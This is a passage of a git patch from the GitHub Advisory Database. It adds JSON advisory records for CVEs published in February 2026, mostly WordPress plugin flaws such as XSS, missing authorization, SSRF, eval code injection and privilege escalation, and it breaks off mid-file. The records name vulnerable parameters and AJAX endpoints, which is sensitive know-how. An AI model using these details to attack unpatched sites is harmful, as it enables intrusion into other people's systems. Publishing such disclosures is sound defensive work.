"severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27034" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T04:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vrm4-h3r4-hh29/GHSA-vrm4-h3r4-hh29.json b/advisories/unreviewed/2026/02/GHSA-vrm4-h3r4-hh29/GHSA-vrm4-h3r4-hh29.json new file mode 100644 index 0000000000000..6df91580455d2 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vrm4-h3r4-hh29/GHSA-vrm4-h3r4-hh29.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vrm4-h3r4-hh29", + "modified": "2026-02-18T06:30:18Z", + "published": "2026-02-18T06:30:18Z", + "aliases": [ + "CVE-2026-27031" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27031" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T04:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wpf3-wv8v-2wxj/GHSA-wpf3-wv8v-2wxj.json b/advisories/unreviewed/2026/02/GHSA-wpf3-wv8v-2wxj/GHSA-wpf3-wv8v-2wxj.json new file mode 100644 index 0000000000000..a6b73996ee3fd --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wpf3-wv8v-2wxj/GHSA-wpf3-wv8v-2wxj.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wpf3-wv8v-2wxj", + "modified": "2026-02-18T06:30:19Z", + "published": "2026-02-18T06:30:19Z", + "aliases": [ + "CVE-2025-12071" + ], + "details": "The Frontend User Notes plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.1.0 via the 'funp_ajax_modify_notes' AJAX endpoint due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify arbitrary notes that do not belong to them.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12071" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/frontend-user-notes/tags/2.1.1/includes/ajax.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/30f2dd33-228d-4942-88d9-78c7ed0b79a1?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-639" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T05:16:16Z" + } +} \ No newline at end of file From d6d6c974b5a7967b6140980bb26d7ef5c03f3d15 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 18 Feb 2026 09:32:25 +0000 Subject: [PATCH 148/215] Publish Advisories GHSA-34f4-7p4v-274v GHSA-53pp-j4fh-wvrr GHSA-5c5v-f747-q7rq GHSA-6mq9-qm49-w244 GHSA-77g9-fwj8-pcwg GHSA-8425-76gw-qxj4 GHSA-8vw7-m4cj-2323 GHSA-9x54-6v7m-8wf2 GHSA-cwvx-vcjx-vqjc GHSA-cxr2-7xvc-hh42 GHSA-g6wj-gw42-4345 GHSA-gch6-cfhh-c44p GHSA-gmgx-8hxg-f53q GHSA-gxvp-w433-832f GHSA-h92c-7ccr-x4hr GHSA-jh7f-pj8r-h37c GHSA-p572-g32f-hp32 GHSA-q7cc-x725-hp7g GHSA-q7wp-4j7p-g4vj GHSA-qfwf-756h-2p4g GHSA-qj9g-q4j9-47hp GHSA-rg7x-c263-823c GHSA-wxhm-86c2-x66c GHSA-xf7v-j2cc-2crf --- .../GHSA-34f4-7p4v-274v.json | 48 ++++++++++++++ .../GHSA-53pp-j4fh-wvrr.json | 48 ++++++++++++++ .../GHSA-5c5v-f747-q7rq.json | 52 +++++++++++++++ .../GHSA-6mq9-qm49-w244.json | 56 ++++++++++++++++ .../GHSA-77g9-fwj8-pcwg.json | 48 ++++++++++++++ .../GHSA-8425-76gw-qxj4.json | 48 ++++++++++++++ .../GHSA-8vw7-m4cj-2323.json | 60 +++++++++++++++++ .../GHSA-9x54-6v7m-8wf2.json | 25 ++++++++ .../GHSA-cwvx-vcjx-vqjc.json | 48 ++++++++++++++ .../GHSA-cxr2-7xvc-hh42.json | 52 +++++++++++++++ .../GHSA-g6wj-gw42-4345.json | 48 ++++++++++++++ .../GHSA-gch6-cfhh-c44p.json | 48 ++++++++++++++ .../GHSA-gmgx-8hxg-f53q.json | 52 +++++++++++++++ .../GHSA-gxvp-w433-832f.json | 52 +++++++++++++++ .../GHSA-h92c-7ccr-x4hr.json | 52 +++++++++++++++ .../GHSA-jh7f-pj8r-h37c.json | 56 ++++++++++++++++ .../GHSA-p572-g32f-hp32.json | 56 ++++++++++++++++ .../GHSA-q7cc-x725-hp7g.json | 48 ++++++++++++++ .../GHSA-q7wp-4j7p-g4vj.json | 48 ++++++++++++++ .../GHSA-qfwf-756h-2p4g.json | 60 +++++++++++++++++ .../GHSA-qj9g-q4j9-47hp.json | 52 +++++++++++++++ .../GHSA-rg7x-c263-823c.json | 56 ++++++++++++++++ .../GHSA-wxhm-86c2-x66c.json | 44 +++++++++++++ .../GHSA-xf7v-j2cc-2crf.json | 64 +++++++++++++++++++ 24 files changed, 1221 insertions(+) create mode 100644 advisories/unreviewed/2026/02/GHSA-34f4-7p4v-274v/GHSA-34f4-7p4v-274v.json create mode 100644 advisories/unreviewed/2026/02/GHSA-53pp-j4fh-wvrr/GHSA-53pp-j4fh-wvrr.json create mode 100644 advisories/unreviewed/2026/02/GHSA-5c5v-f747-q7rq/GHSA-5c5v-f747-q7rq.json create mode 100644 advisories/unreviewed/2026/02/GHSA-6mq9-qm49-w244/GHSA-6mq9-qm49-w244.json create mode 100644 advisories/unreviewed/2026/02/GHSA-77g9-fwj8-pcwg/GHSA-77g9-fwj8-pcwg.json create mode 100644 advisories/unreviewed/2026/02/GHSA-8425-76gw-qxj4/GHSA-8425-76gw-qxj4.json create mode 100644 advisories/unreviewed/2026/02/GHSA-8vw7-m4cj-2323/GHSA-8vw7-m4cj-2323.json create mode 100644 advisories/unreviewed/2026/02/GHSA-9x54-6v7m-8wf2/GHSA-9x54-6v7m-8wf2.json create mode 100644 advisories/unreviewed/2026/02/GHSA-cwvx-vcjx-vqjc/GHSA-cwvx-vcjx-vqjc.json create mode 100644 advisories/unreviewed/2026/02/GHSA-cxr2-7xvc-hh42/GHSA-cxr2-7xvc-hh42.json create mode 100644 advisories/unreviewed/2026/02/GHSA-g6wj-gw42-4345/GHSA-g6wj-gw42-4345.json create mode 100644 advisories/unreviewed/2026/02/GHSA-gch6-cfhh-c44p/GHSA-gch6-cfhh-c44p.json create mode 100644 advisories/unreviewed/2026/02/GHSA-gmgx-8hxg-f53q/GHSA-gmgx-8hxg-f53q.json create mode 100644 advisories/unreviewed/2026/02/GHSA-gxvp-w433-832f/GHSA-gxvp-w433-832f.json create mode 100644 advisories/unreviewed/2026/02/GHSA-h92c-7ccr-x4hr/GHSA-h92c-7ccr-x4hr.json create mode 100644 advisories/unreviewed/2026/02/GHSA-jh7f-pj8r-h37c/GHSA-jh7f-pj8r-h37c.json create mode 100644 advisories/unreviewed/2026/02/GHSA-p572-g32f-hp32/GHSA-p572-g32f-hp32.json create mode 100644 advisories/unreviewed/2026/02/GHSA-q7cc-x725-hp7g/GHSA-q7cc-x725-hp7g.json create mode 100644 advisories/unreviewed/2026/02/GHSA-q7wp-4j7p-g4vj/GHSA-q7wp-4j7p-g4vj.json create mode 100644 advisories/unreviewed/2026/02/GHSA-qfwf-756h-2p4g/GHSA-qfwf-756h-2p4g.json create mode 100644 advisories/unreviewed/2026/02/GHSA-qj9g-q4j9-47hp/GHSA-qj9g-q4j9-47hp.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rg7x-c263-823c/GHSA-rg7x-c263-823c.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wxhm-86c2-x66c/GHSA-wxhm-86c2-x66c.json create mode 100644 advisories/unreviewed/2026/02/GHSA-xf7v-j2cc-2crf/GHSA-xf7v-j2cc-2crf.json diff --git a/advisories/unreviewed/2026/02/GHSA-34f4-7p4v-274v/GHSA-34f4-7p4v-274v.json b/advisories/unreviewed/2026/02/GHSA-34f4-7p4v-274v/GHSA-34f4-7p4v-274v.json new file mode 100644 index 0000000000000..d73bd87cbad3d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-34f4-7p4v-274v/GHSA-34f4-7p4v-274v.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-34f4-7p4v-274v", + "modified": "2026-02-18T09:31:04Z", + "published": "2026-02-18T09:31:04Z", + "aliases": [ + "CVE-2026-2281" + ], + "details": "The Private Comment plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Label text' setting in all versions up to, and including, 0.0.4. This is due to insufficient input sanitization and output escaping on the plugin's label text option. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2281" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/private-comment/tags/0.0.3/private-comment.php#L128" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/private-comment/trunk/private-comment.php#L128" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3458294/private-comment/trunk/private-comment.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/94d75f18-67ab-4367-982b-73e256d5dbe2?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T07:16:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-53pp-j4fh-wvrr/GHSA-53pp-j4fh-wvrr.json b/advisories/unreviewed/2026/02/GHSA-53pp-j4fh-wvrr/GHSA-53pp-j4fh-wvrr.json new file mode 100644 index 0000000000000..65896427e7875 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-53pp-j4fh-wvrr/GHSA-53pp-j4fh-wvrr.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-53pp-j4fh-wvrr", + "modified": "2026-02-18T09:31:04Z", + "published": "2026-02-18T09:31:04Z", + "aliases": [ + "CVE-2026-1656" + ], + "details": "The Business Directory Plugin for WordPress is vulnerable to authorization bypass due to a missing authorization check in all versions up to, and including, 6.4.20. This makes it possible for unauthenticated attackers to modify arbitrary listings, including changing titles, content, and email addresses, by directly referencing the listing ID in crafted requests to the wpbdp_ajax AJAX action.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1656" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/business-directory-plugin/tags/6.4.20/includes/helpers/class-authenticated-listing-view.php#L20" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/business-directory-plugin/trunk/includes/helpers/class-authenticated-listing-view.php#L20" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3452627/business-directory-plugin/tags/6.4.21/includes/controllers/pages/class-submit-listing.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f894ce75-168c-4baa-8cae-d2e7f1a0a9ab?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T09:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-5c5v-f747-q7rq/GHSA-5c5v-f747-q7rq.json b/advisories/unreviewed/2026/02/GHSA-5c5v-f747-q7rq/GHSA-5c5v-f747-q7rq.json new file mode 100644 index 0000000000000..e5228cf404a20 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-5c5v-f747-q7rq/GHSA-5c5v-f747-q7rq.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5c5v-f747-q7rq", + "modified": "2026-02-18T09:31:03Z", + "published": "2026-02-18T09:31:03Z", + "aliases": [ + "CVE-2026-1666" + ], + "details": "The Download Manager plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'redirect_to' parameter in all versions up to, and including, 3.3.46. This is due to insufficient input sanitization and output escaping on the 'redirect_to' GET parameter in the login form shortcode. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1666" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/download-manager/tags/3.3.46/src/User/Login.php#L137" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/download-manager/tags/3.3.46/src/User/views/login-form.php#L142" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3455081%40download-manager%2Ftrunk&old=3440008%40download-manager%2Ftrunk&sfp_email=&sfph_mail=#file25" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/3cb84ba3-b403-4a9d-b1a7-92aa947310ac?source=cve" + }, + { + "type": "WEB", + "url": "https://www.wpdownloadmanager.com/doc/short-codes/wpdm_login_form-user-login-form-short-code" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T07:16:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-6mq9-qm49-w244/GHSA-6mq9-qm49-w244.json b/advisories/unreviewed/2026/02/GHSA-6mq9-qm49-w244/GHSA-6mq9-qm49-w244.json new file mode 100644 index 0000000000000..7aef7673f85d8 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-6mq9-qm49-w244/GHSA-6mq9-qm49-w244.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6mq9-qm49-w244", + "modified": "2026-02-18T09:31:04Z", + "published": "2026-02-18T09:31:04Z", + "aliases": [ + "CVE-2026-2127" + ], + "details": "The SiteOrigin Widgets Bundle plugin for WordPress is vulnerable to unauthorized arbitrary shortcode execution in all versions up to, and including, 1.70.4. This is due to a missing capability check on the `siteorigin_widget_preview_widget_action()` function which is registered via the `wp_ajax_so_widgets_preview` AJAX action. The function only verifies a nonce (`widgets_action`) but does not check user capabilities. This makes it possible for authenticated attackers, with Subscriber-level access and above, to execute arbitrary shortcodes by invoking the `SiteOrigin_Widget_Editor_Widget` via the preview endpoint. The required nonce is exposed on the public frontend when the Post Carousel widget is present on a page, embedded in the `data-ajax-url` HTML attribute.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2127" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/so-widgets-bundle/tags/1.70.4/base/inc/actions.php#L6" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/so-widgets-bundle/tags/1.70.4/base/inc/actions.php#L75" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/so-widgets-bundle/tags/1.70.4/widgets/editor/editor.php#L120" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/so-widgets-bundle/tags/1.70.4/widgets/post-carousel/post-carousel.php#L590" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3460939%40so-widgets-bundle%2Ftrunk&old=3434183%40so-widgets-bundle%2Ftrunk&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/bf92c64b-ca76-4af7-a1e4-585a60b03153?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T09:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-77g9-fwj8-pcwg/GHSA-77g9-fwj8-pcwg.json b/advisories/unreviewed/2026/02/GHSA-77g9-fwj8-pcwg/GHSA-77g9-fwj8-pcwg.json new file mode 100644 index 0000000000000..e0d470e5fbab3 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-77g9-fwj8-pcwg/GHSA-77g9-fwj8-pcwg.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-77g9-fwj8-pcwg", + "modified": "2026-02-18T09:31:04Z", + "published": "2026-02-18T09:31:04Z", + "aliases": [ + "CVE-2026-1937" + ], + "details": "The YayMail – WooCommerce Email Customizer plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the `yaymail_import_state` AJAX action in all versions up to, and including, 4.3.2. This makes it possible for authenticated attackers, with Shop Manager-level access and above, to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1937" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/yaymail/tags/4.3.2/src/Models/MigrationModel.php#L143" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/yaymail/trunk/src/Models/MigrationModel.php#L143" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3460087%40yaymail&new=3460087%40yaymail&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/5a17ded3-340d-494f-be7e-2550dab360bc?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T07:16:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-8425-76gw-qxj4/GHSA-8425-76gw-qxj4.json b/advisories/unreviewed/2026/02/GHSA-8425-76gw-qxj4/GHSA-8425-76gw-qxj4.json new file mode 100644 index 0000000000000..99a3c7283332e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-8425-76gw-qxj4/GHSA-8425-76gw-qxj4.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8425-76gw-qxj4", + "modified": "2026-02-18T09:31:03Z", + "published": "2026-02-18T09:31:03Z", + "aliases": [ + "CVE-2026-1857" + ], + "details": "The Gutenberg Blocks with AI by Kadence WP plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 3.6.1. This is due to insufficient validation of the `endpoint` parameter in the `get_items()` function of the GetResponse REST API handler. The endpoint's permission check only requires `edit_posts` capability (Contributor role) rather than `manage_options` (Administrator). This makes it possible for authenticated attackers, with Contributor-level access and above, to make server-side requests to arbitrary endpoints on the configured GetResponse API server, retrieving sensitive data such as contacts, campaigns, and mailing lists using the site's stored API credentials. The stored API key is also leaked in the request headers.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1857" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/kadence-blocks/tags/3.5.32/includes/advanced-form/getresponse-rest-api.php#L57" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/kadence-blocks/tags/3.5.32/includes/advanced-form/getresponse-rest-api.php#L77" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3454881%40kadence-blocks%2Ftrunk&old=3453204%40kadence-blocks%2Ftrunk&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2ea8d38a-f5ce-40dd-a015-f56d60579e05?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T07:16:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-8vw7-m4cj-2323/GHSA-8vw7-m4cj-2323.json b/advisories/unreviewed/2026/02/GHSA-8vw7-m4cj-2323/GHSA-8vw7-m4cj-2323.json new file mode 100644 index 0000000000000..5d13751701bc9 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-8vw7-m4cj-2323/GHSA-8vw7-m4cj-2323.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8vw7-m4cj-2323", + "modified": "2026-02-18T09:31:04Z", + "published": "2026-02-18T09:31:04Z", + "aliases": [ + "CVE-2026-2642" + ], + "details": "A security vulnerability has been detected in ggreer the_silver_searcher up to 2.2.0. The impacted element is the function search_stream of the file src/search.c. The manipulation leads to null pointer dereference. Local access is required to approach this attack. The exploit has been disclosed publicly and may be used. The project was informed of the problem early through an issue report but has not responded yet.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2642" + }, + { + "type": "WEB", + "url": "https://github.com/ggreer/the_silver_searcher/issues/1558" + }, + { + "type": "WEB", + "url": "https://github.com/ggreer/the_silver_searcher" + }, + { + "type": "WEB", + "url": "https://github.com/oneafter/0119/blob/main/segv1" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346398" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346398" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.752769" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-404" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T07:16:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-9x54-6v7m-8wf2/GHSA-9x54-6v7m-8wf2.json b/advisories/unreviewed/2026/02/GHSA-9x54-6v7m-8wf2/GHSA-9x54-6v7m-8wf2.json new file mode 100644 index 0000000000000..a4b70b7c5882b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-9x54-6v7m-8wf2/GHSA-9x54-6v7m-8wf2.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9x54-6v7m-8wf2", + "modified": "2026-02-18T09:31:04Z", + "published": "2026-02-18T09:31:04Z", + "aliases": [ + "CVE-2026-25421" + ], + "details": "Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority. Collision with another CVE.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25421" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T08:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-cwvx-vcjx-vqjc/GHSA-cwvx-vcjx-vqjc.json b/advisories/unreviewed/2026/02/GHSA-cwvx-vcjx-vqjc/GHSA-cwvx-vcjx-vqjc.json new file mode 100644 index 0000000000000..0c1143260740c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-cwvx-vcjx-vqjc/GHSA-cwvx-vcjx-vqjc.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cwvx-vcjx-vqjc", + "modified": "2026-02-18T09:31:04Z", + "published": "2026-02-18T09:31:04Z", + "aliases": [ + "CVE-2026-2019" + ], + "details": "The Cart All In One For WooCommerce plugin for WordPress is vulnerable to Code Injection in all versions up to, and including, 1.1.21. This is due to insufficient input validation on the 'Assign page' field which is passed directly to the eval() function. This makes it possible for authenticated attackers, with Administrator-level access and above, to execute arbitrary PHP code on the server.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2019" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/woo-cart-all-in-one/tags/1.1.21/includes/frontend/sidebar-cart-icon.php#L245" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/woo-cart-all-in-one/trunk/includes/frontend/sidebar-cart-icon.php#L245" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3455202" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/25bdb89f-3478-4a1a-8bf0-46e88207eb21?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T07:16:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-cxr2-7xvc-hh42/GHSA-cxr2-7xvc-hh42.json b/advisories/unreviewed/2026/02/GHSA-cxr2-7xvc-hh42/GHSA-cxr2-7xvc-hh42.json new file mode 100644 index 0000000000000..595643344c0d5 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-cxr2-7xvc-hh42/GHSA-cxr2-7xvc-hh42.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cxr2-7xvc-hh42", + "modified": "2026-02-18T09:31:04Z", + "published": "2026-02-18T09:31:04Z", + "aliases": [ + "CVE-2026-1649" + ], + "details": "The Community Events plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'ce_venue_name' parameter in all versions up to, and including, 1.5.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1649" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/community-events/tags/1.5.7/community-events.php#L1403" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/community-events/tags/1.5.7/community-events.php#L779" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/community-events/trunk/community-events.php#L1403" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3456114%40community-events&new=3456114%40community-events&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c44232a9-7b97-449c-b584-ca3c26d63581?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T09:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-g6wj-gw42-4345/GHSA-g6wj-gw42-4345.json b/advisories/unreviewed/2026/02/GHSA-g6wj-gw42-4345/GHSA-g6wj-gw42-4345.json new file mode 100644 index 0000000000000..29943494063e7 --- /dev/null +++ 